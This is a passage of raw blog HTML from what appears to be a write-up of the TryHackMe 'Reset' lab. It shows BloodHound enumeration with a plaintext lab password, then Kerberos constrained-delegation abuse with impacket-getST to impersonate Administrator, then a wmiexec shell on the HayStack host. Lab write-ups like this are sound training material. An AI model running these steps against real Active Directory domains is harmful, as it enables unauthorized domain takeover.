domains in the forest\nINFO: Found 1 computers\nINFO: Connecting to LDAP server: haystack.thm.corp\nINFO: Found 42 users\nINFO: Found 55 groups\nINFO: Found 3 gpos\nINFO: Found 222 ous\nINFO: Found 20 containers\nINFO: Found 0 trusts\nINFO: Starting computer enumeration with 10 workers\nINFO: Querying computer: HayStack.thm.corp\nINFO: Done in 01M 45S\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/Darla_Winters<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">bloodhound-python<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-d<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DARLA_WINTERS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Resetme789@<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-ns<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.52.38<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-c<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">all<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AD<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">domain:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Getting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TGT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">user<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Connecting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LDAP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">haystack.thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">domains<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">domains<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">forest<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">computers<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Connecting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LDAP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">haystack.thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">42<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">users<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">55<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">groups<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gpos<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">222<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ous<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">20<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">containers<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">trusts<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">computer<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">enumeration<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">with<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">workers<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Querying<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">computer:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HayStack.thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">INFO:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Done<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">01<\/span><span style=\"color: #C3E88D\">M<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">45<\/span><span style=\"color: #C3E88D\">S<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>After uploading the BloodHound data, we can mark DARLA_WINTERS as owned and start analyzing the database.<\/p>\n\n\n\n<p>An interesting thing that will pop up right away is that Darla has delegating rights.<\/p>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>In the Active Directory, delegation is a feature that enables specific accounts (user or computer) to impersonate other accounts to access particular services on the network.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09f76294&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09f76294\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"503\" data-attachment-id=\"363\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/image-54\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-54.png?fit=1285%2C631&amp;ssl=1\" data-orig-size=\"1285,631\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-54\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-54.png?fit=1024%2C503&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-54.png?resize=1024%2C503&#038;ssl=1\" alt=\"\" class=\"wp-image-363\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-54.png?resize=1024%2C503&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-54.png?resize=300%2C147&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-54.png?resize=768%2C377&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-54.png?resize=600%2C295&amp;ssl=1 600w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-54.png?w=1285&amp;ssl=1 1285w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Privilege Escalation<\/mark><\/h3>\n\n\n\n<p><strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">CIFS <\/mark><\/em><\/strong>or Common Internet File System is a file-sharing protocol that is mainly used to provide shared access to all the local systems to the remote files or other services like printing remotely. A CIFS client i.e. any computer of that network can read, write, edit, and even delete files from the remote server. It also can communicate with any server in the network that has been set up to communicate with the CIFS client, there are no restrictions like it will only connect with specific devices that come with it.<\/p>\n\n\n\n<p>Using this right, we can impersonate the <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Administrator<\/mark><\/em><\/strong> user on the HayStack machine.<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/Darla_Winters]\n\u2514\u2500$ impacket-getST -k -impersonate Administrator -spn cifs\/HayStack.thm.corp thm.corp\/DARLA_WINTERS\nImpacket v0.11.0 - Copyright 2023 Fortra\n\nPassword:\n[-] CCache file is not found. Skipping...\n[*] Getting TGT for user\n[*] Impersonating Administrator\n[*] \tRequesting S4U2self\n[*] \tRequesting S4U2Proxy\n[*] Saving ticket in Administrator.ccache\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/Darla_Winters<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-getST<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-k<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-impersonate<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Administrator<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-spn<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cifs\/HayStack.thm.corp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp\/DARLA_WINTERS<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Password:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">-<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> CCache file is not found. Skipping...<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Getting TGT <\/span><span style=\"color: #89DDFF; font-style: italic\">for<\/span><span style=\"color: #BABED8\"> user<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Impersonating Administrator<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> \tRequesting S4U2self<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> \tRequesting S4U2Proxy<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Saving ticket <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> Administrator.ccache<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We were able to get the TGT for the user and successfully impersonated the Administrator user. We can try to run <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">wmiexec <\/mark><\/em><\/strong>and get a shell on the machine as Administrator!<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/Darla_Winters]\n\u2514\u2500$ export KRB5CCNAME=Administrator.ccache\n                                                                                                             \n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/Darla_Winters]\n\u2514\u2500$ wmiexec.py -k -no-pass Administrator@HayStack.thm.corp\nImpacket v0.9.19 - Copyright 2019 SecureAuth Corporation\n\n[*] SMBv3.0 dialect used\n[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands\nC:\\&gt;whoami\nthm\\Administrator\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/Darla_Winters<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">export<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">KRB5CCNAME=Administrator.ccache<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                                                                                             <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/Darla_Winters<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">wmiexec.py<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-k<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-no-pass<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Administrator@HayStack.thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.9.19<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2019<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SecureAuth<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Corporation<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> SMBv3.0 dialect used<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[!]<\/span><span style=\"color: #BABED8\"> Launching semi-interactive shell - Careful what you execute<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[!]<\/span><span style=\"color: #BABED8\"> Press help <\/span><span style=\"color: #89DDFF; font-style: italic\">for<\/span><span style=\"color: #BABED8\"> extra shell commands<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">C:\\&gt;whoami<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">thm\\Administrator<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"C:\\Users\\Administrator\\Desktop&gt;dir\n Volume in drive C has no label.\n Volume Serial Number is A8A4-C362\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n07\/14\/2023  07:23 AM    &lt;DIR&gt;          .\n07\/14\/2023  07:23 AM    &lt;DIR&gt;          ..\n06\/21\/2016  03:36 PM               527 EC2 Feedback.website\n06\/21\/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website\n06\/16\/2023  04:37 PM                30 root.txt\n               3 File(s)          1,111 bytes\n               2 Dir(s)  12,381,659,136 bytes free\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #BABED8\">C:\\Users\\Administrator\\Desktop<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: 